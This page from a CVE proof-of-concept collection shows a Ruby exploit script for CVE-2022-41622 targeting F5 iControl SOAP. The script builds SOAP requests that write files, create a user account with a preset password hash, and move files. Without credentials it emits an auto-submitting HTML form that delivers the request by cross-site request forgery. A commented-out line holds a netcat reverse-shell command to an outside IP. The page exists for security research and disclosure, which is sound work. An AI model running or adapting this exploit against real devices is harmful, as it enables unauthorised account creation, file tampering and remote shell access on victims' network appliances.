4837 Total CVEs
26 Years
GitHub
Home / 2022 / CVE-2022-41622
README.md
Rendering markdown...
POC / f5-soap-exploit.rb RB
⬇ Raw GitHub ✕ Close 
require 'httparty'
require 'base64'

def usage()
  $stderr.puts "ruby #{ $0 } <target> <xml_template> [username:password]"
  exit
end

TARGET = ARGV[0] || usage()
TARGET_URL = "https://#{ TARGET }/iControl/iControlPortal.cgi"

TEMPLATE_FILE = ARGV[1] || usage()
begin
  TEMPLATE = File.read(TEMPLATE_FILE)
rescue StandardError => e
  $stderr.puts "File not found: #{ TEMPLATE_FILE }"
  $stderr.puts
  usage()
end

ACCOUNT = ARGV[2]
if ACCOUNT
  $stderr.puts "NOTE: You've provided a username and password, which means this is going"
  $stderr.puts "to authenticate, and therefore isn't an exploit"
  $stderr.puts
  $stderr.puts "Don't enter a username:password if you want to generate a CSRF exploit!"
end

# Set up some defaults
DEFAULTS = {
  'FILENAME' => '/tmp/csrfdemo.txt',
  'BASE64FILEDATA' => 'SGVsbG8gd29ybGQh',
  'USERNAME' => 'rontest',
  'FULLNAME' => 'Ron Test',
  'CRYPTSHA512HASH' => '$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0', # "Password1"
  'FROM_FILENAME' => '/tmp/file1',
  'TO_FILENAME' => '/tmp/file2',
}

#COMMAND = "nc -e /bin/bash 10.0.0.146 4444 2>&1 > /dev/null &"
DELAY = 1000

# Fill in the template
REQUEST = TEMPLATE.gsub(/%%%[a-zA-Z0-9_]+%%%/) do |var|
  var.gsub!(/%/, '')
  $stderr.print "Value for #{ var } [#{ DEFAULTS[var] }]: "
  $stderr.flush

  val = $stdin.gets&.chomp
  if !val || val.length == 0
    val = DEFAULTS[var]
  end

  val
end

if ACCOUNT
  $stderr.puts "Sending the following payload directly to #{ TARGET }..."
  $stderr.puts
  $stderr.puts REQUEST

  response = HTTParty.post(
    TARGET_URL,
    verify: false,
    headers: {
      authorization: Base64::encode64(ACCOUNT),
      'content-type': 'text/xml',
    },
    body: REQUEST
  )
  $stderr.puts
  $stderr.puts "Response:"
  $stderr.puts response
  $stderr.puts
  $stderr.puts '---'

  if response.body =~ /(error_string.*)/
    $stderr.puts "Something went wrong:"
    $stderr.puts
    $stderr.puts $1
    exit 1
  end
else
  puts %{
      <form id="form" method="post" action="#{ TARGET_URL }" enctype="text/plain">
        <textarea id="payload" name="&lt;!--">--&gt;#{ REQUEST.gsub(/</, '&lt;').gsub(/>/, '&gt;') }</textarea>
        <input type=submit>
      </form>

      <script>
        setTimeout(function() {
          document.getElementById("form").submit();
        }, #{ DELAY });
      </script>
}
end